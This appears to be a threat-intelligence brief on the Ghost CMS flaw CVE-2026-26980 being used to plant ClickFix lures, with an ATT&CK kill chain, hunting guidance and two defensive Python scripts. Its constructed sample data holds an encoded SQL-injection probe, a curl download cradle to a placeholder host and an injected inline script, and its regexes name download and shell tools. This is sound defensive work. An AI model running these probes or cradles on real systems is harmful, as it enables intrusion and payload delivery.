Ghost CMS CVE-2026-26980 → ClickFix: the CMS-compromise-to-endpoint kill chain
Entities: SentinelOne
Part of run 2026-05-25-d675ef38 (intel · unknown)
Background. CVE-2026-26980 was disclosed and patched in Ghost 6.19.1 on 19 February 2026, and SentinelOne reported in-the-wild exploitation and detection guidance by 27 February (BleepingComputer, 2026-05-24). The May activity XLab documented is not a new bug but a large-scale weaponisation of the unpatched long tail of self-hosted instances, repurposing compromised editorial sites as a high-traffic, low-attributable delivery surface for ClickFix social engineering (XLab Qianxin, 2026-05-21). ClickFix / FakeCaptcha — tricking a user into pasting an attacker-supplied command into the Run dialog or a terminal — has been a tracked initial-access technique since 2024; what is notable here is the combination of a CVSS-9.4 pre-auth CMS flaw as the distribution mechanism with a fingerprinting/cloaking stage that keeps the lure invisible to non-targets and to casual review.
Kill chain → MITRE ATT&CK.
- Initial access — T1190 Exploit Public-Facing Application. Unauthenticated boolean-based blind SQL injection through the Content API's `slug` filter parameter. No credentials, no user interaction — the request pattern the vendor mitigation keys on is a query string containing `slug:[` (`slug%3A%5B`).
- Credential access — T1552 Unsecured Credentials. The injection is used to read the admin API key out of Ghost's database. This key is a bearer token with full content-management scope, so its theft is the privilege pivot — there is no separate authentication step after extraction.
- Content injection / defacement — T1659 Content Injection. With the admin key the attacker injects a lightweight JavaScript loader into published articles and/or theme templates, so the malicious code is served to every visitor from the site's own trusted origin.
- Execution-guardrails cloaking — T1480 Execution Guardrails. The loader fetches a second-stage cloaking script that fingerprints each visitor and only proceeds for those matching the target profile (e.g. Windows desktop), so most visitors and most analysts never see the lure.
- User execution — T1204.002 User Execution: Malicious File, chained to T1059.001 PowerShell / T1059.003 Windows Command Shell. Qualifying visitors are shown a fake Cloudflare "verify you are human" prompt in an overlay iframe instructing them to paste a supplied command into the Windows Run dialog (Win+R) or a terminal.
- Payload delivery — T1105 Ingress Tool Transfer. The pasted command pulls follow-on payloads; XLab observed DLL loaders, JavaScript droppers, and an Electron-based sample named `UtilifySetup.exe`, leading to info-stealer / RAT capability.
Detection concepts (no IOCs). Two distinct hunt surfaces:
- Server-side, for Ghost operators. Review web-server / reverse-proxy access logs for Content API requests to `/ghost/api/content/` whose `filter` / `slug` parameter contains `slug:[` (`slug%3A%5B`) or boolean-blind SQL artefacts (`AND`, `CASE`, time-delay primitives) — the vendor mitigation pattern is the highest-fidelity signal. In the Ghost admin audit trail, alert on unexpected article or theme modifications, and on any `<script>` element appearing in post content or theme files that has no editorial counterpart.
- Client-side, for everyone (the product-agnostic, higher-value hunt). The ClickFix execution chain is independent of Ghost and is the artefact most defenders can actually catch: Sysmon Event ID 1 / Windows 4688 for `cmd.exe` or `powershell.exe` (especially with `-EncodedCommand`, clipboard-paste context, `mshta`, `curl`/`certutil` download cradles) whose parent process is a browser (`chrome.exe`, `msedge.exe`, `firefox.exe`, `brave.exe`) or `explorer.exe` immediately following a Win+R Run-dialog launch. Flag execution of unsigned Electron applications from user-writable paths. Enable PowerShell Script Block Logging (Event ID 4104) to capture the pasted stager body.
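Both hunt surfaces above, as an added example that is not part of the brief or of any vendor tooling. The first half applies the vendor mitigation pattern plus a low-fidelity SQL-artefact check to constructed combined-format access log lines (it percent-decodes repeatedly so a double-encoded `slug%253A%255B` still surfaces as `slug:[`); the second half applies the browser-parent / Run-dialog-cradle logic to constructed Sysmon Event ID 1 records. The log format, the Sysmon field names (`Image`, `ParentImage`, `CommandLine`) and all sample values are assumptions for the example:

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# --- Server-side hunt: Ghost Content API requests carrying the vendor mitigation pattern ---

CONTENT_API_PREFIX = "/ghost/api/content/"
VENDOR_PATTERN = "slug:["   # arrives on the wire as slug%3A%5B, sometimes double-encoded
# Low-fidelity boolean-blind / time-based SQL artefacts, only evaluated inside filter/slug values.
SQLI_ARTEFACTS = re.compile(
    r"(?i)\s(AND|OR)\s+\S+\s*[=<>]|\bCASE\s+WHEN\b|\b(SLEEP|BENCHMARK|PG_SLEEP)\s*\(|\bWAITFOR\s+DELAY\b"
)
# Combined (nginx/Apache) access log format is assumed for this example.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log (not real traffic): two injection probes, one benign API call, one page view.
ACCESS_LOG = """\
203.0.113.7 - - [21/May/2026:10:12:01 +0000] "GET /ghost/api/content/posts/?key=abc&filter=slug%3A%5Bhello%5D HTTP/1.1" 200 512 "-" "curl/8.0"
203.0.113.7 - - [21/May/2026:10:12:02 +0000] "GET /ghost/api/content/posts/?key=abc&filter=slug%253A%255B%2527%2520AND%25201%253D1--%255D HTTP/1.1" 200 512 "-" "curl/8.0"
198.51.100.4 - - [21/May/2026:10:13:05 +0000] "GET /ghost/api/content/posts/?key=abc&filter=tag%3Anews HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.9 - - [21/May/2026:10:14:00 +0000] "GET /about/ HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
"""


def normalise(value: str) -> str:
    """Bounded repeated percent-decoding so slug%3A%5B and slug%253A%255B both become slug:[."""
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def flag_ghost_request(line: str):
    """Return a finding for an access-log line that looks like a CVE-2026-26980 probe, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    parts = urlsplit(target)
    if not parts.path.startswith(CONTENT_API_PREFIX):
        return None
    reasons = []
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        if name not in ("filter", "slug"):
            continue
        value = normalise(raw)
        if VENDOR_PATTERN in value:
            reasons.append("vendor pattern slug:[ in %s" % name)
        if SQLI_ARTEFACTS.search(value):
            reasons.append("SQL artefact in %s" % name)
    if not reasons:
        return None
    return {"ip": m.group("ip"), "time": m.group("ts"), "target": target, "reasons": reasons}


def hunt_access_log(text: str) -> list:
    """Run flag_ghost_request over every line and keep the hits."""
    return [f for f in (flag_ghost_request(l) for l in text.splitlines()) if f]


# --- Client-side hunt: shell spawned by a browser, or by explorer.exe with an encoded/download cradle ---

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
CRADLE_RE = re.compile(
    r"(?i)-e(?:nc(?:odedcommand)?)?\s|\bmshta\b|\bcurl\b|\bcertutil\b|\biwr\b|invoke-webrequest|downloadstring|\biex\b"
)

# Constructed Sysmon Event ID 1 records; the base64 blob is a placeholder, not a real stager.
SYSMON_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -EncodedCommand UExBQ0VIT0xERVI="},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": "cmd.exe /c curl -o %TEMP%\\u.exe http://example.invalid/x"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c dir"},
]


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def flag_clickfix_process(event: dict):
    """Return reasons if a process-creation event matches the ClickFix paste-to-shell pattern, else None."""
    if event.get("EventID") != 1:
        return None
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    reasons = []
    if image in SHELLS and parent in BROWSERS:
        reasons.append("shell %s spawned directly by browser %s" % (image, parent))
    if image in SHELLS and parent == "explorer.exe" and CRADLE_RE.search(cmdline):
        reasons.append("explorer-launched shell with encoded/download cradle (Win+R pattern)")
    if image == "mshta.exe" and (parent in BROWSERS or parent == "explorer.exe"):
        reasons.append("mshta launched from %s" % parent)
    return reasons or None


def hunt_sysmon(events: list) -> list:
    """Pair each flagged event with its reasons."""
    hits = []
    for ev in events:
        reasons = flag_clickfix_process(ev)
        if reasons:
            hits.append({"image": ev["Image"], "parent": ev["ParentImage"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in hunt_access_log(ACCESS_LOG):
        print("ghost:", hit)
    for hit in hunt_sysmon(SYSMON_EVENTS):
        print("endpoint:", hit)
```

The `explorer.exe`-parent rule deliberately requires a cradle in the command line: a bare `cmd.exe` under explorer is routine, whereas the brief's signal is the Run-dialog launch carrying an encoded or download stager. The SQL-artefact regex is the lower-fidelity half and will need tuning against the site's own legitimate NQL filters.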
Hardening / mitigation.
- Ghost: upgrade to 6.19.1 or later; until then block `slug:[` / `slug%3A%5B` at the WAF and restrict the public Content API to trusted origins. Assume the admin API key was stolen on any internet-exposed instance — rotate it after patching and audit all posts and theme files for injected scripts.
- Endpoint (the ClickFix surface, applies broadly): where operationally feasible, disable the Win+R Run dialog for standard users via the `NoRun` policy (GPO), deploy detection for clipboard-to-shell execution, and run user-awareness that any web page asking you to "paste this command to prove you are human" is an attack. Constrained Language Mode plus full PowerShell logging reduces the blast radius of a successful paste.
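The post-patch audit step ("audit all posts and theme files for injected scripts"), as an added example that is not part of the brief and not Ghost's own tooling. It walks a list of posts as the Ghost Admin API returns them with `formats=html` (the field names `html`, `codeinjection_head` and `codeinjection_foot` are assumed from Ghost's post model), collects every `<script>` with the standard-library HTML parser, and reports anything without an editorial counterpart: external scripts from hosts outside a constructed allow-list, including relative and protocol-relative URLs, and any inline script body. Posts are prioritised by `updated_at` on or after the disclosure date; the sample posts and hostnames are constructed:

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hosts this site legitimately loads scripts from (constructed editorial allow-list).
ALLOWED_SCRIPT_HOSTS = {"cdn.example.org", "www.example.org"}


class ScriptCollector(HTMLParser):
    """Collect every <script> in an HTML fragment: its src (if any) and its inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._in_script = True
            self.scripts.append({"src": dict(attrs).get("src"), "inline": ""})

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and self.scripts:
            self.scripts[-1]["inline"] += data


# Constructed sample posts (field names assumed from Ghost's post model; hosts are not real).
SAMPLE_POSTS = [
    {"id": "p1", "slug": "welcome", "updated_at": "2026-01-10T09:00:00.000Z",
     "html": '<p>Hello</p><script src="https://cdn.example.org/analytics.js"></script>',
     "codeinjection_head": None, "codeinjection_foot": None},
    {"id": "p2", "slug": "quarterly-update", "updated_at": "2026-05-20T03:14:00.000Z",
     "html": '<p>Report</p><script src="//static.example.invalid/l.js" async></script>',
     "codeinjection_head": "<script>document.body.appendChild(document.createElement('iframe'))</script>",
     "codeinjection_foot": None},
    {"id": "p3", "slug": "plain", "updated_at": "2026-05-22T11:00:00.000Z",
     "html": "<p>No scripts here</p>", "codeinjection_head": None, "codeinjection_foot": None},
]

SCRIPT_FIELDS = ("html", "codeinjection_head", "codeinjection_foot")


def audit_post(post: dict) -> list:
    """One finding per <script> with no editorial counterpart: external scripts from hosts outside
    the allow-list (relative/protocol-relative URLs included, since an attacker holding the admin
    key can also upload theme assets) and any inline script body."""
    findings = []
    for field in SCRIPT_FIELDS:
        fragment = post.get(field) or ""
        if "<script" not in fragment.lower():
            continue
        collector = ScriptCollector()
        collector.feed(fragment)
        collector.close()
        for script in collector.scripts:
            if script["src"]:
                host = (urlsplit(script["src"]).hostname or "").lower()
                if host not in ALLOWED_SCRIPT_HOSTS:
                    findings.append({"field": field, "kind": "external", "src": script["src"], "host": host})
            elif script["inline"].strip():
                findings.append({"field": field, "kind": "inline", "snippet": script["inline"].strip()[:80]})
    return findings


def audit_posts(posts: list, updated_since: str = "2026-02-19") -> dict:
    """Map slug -> findings for posts edited on/after the cutoff (ISO-8601 strings compare
    lexically); pass updated_since="" to audit every post regardless of edit date."""
    report = {}
    for post in posts:
        if post.get("updated_at", "") < updated_since:
            continue
        findings = audit_post(post)
        if findings:
            report[post["slug"]] = findings
    return report


if __name__ == "__main__":
    for slug, findings in audit_posts(SAMPLE_POSTS).items():
        for f in findings:
            print(slug, f)
```

Theme files are handled the same way: feed each template's contents through `ScriptCollector` and compare against the theme as shipped. The date cutoff is a triage aid only; once the admin key is assumed compromised, a full pass with `updated_since=""` is the safe default.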
Source: ctipilot v2 brief (migrated)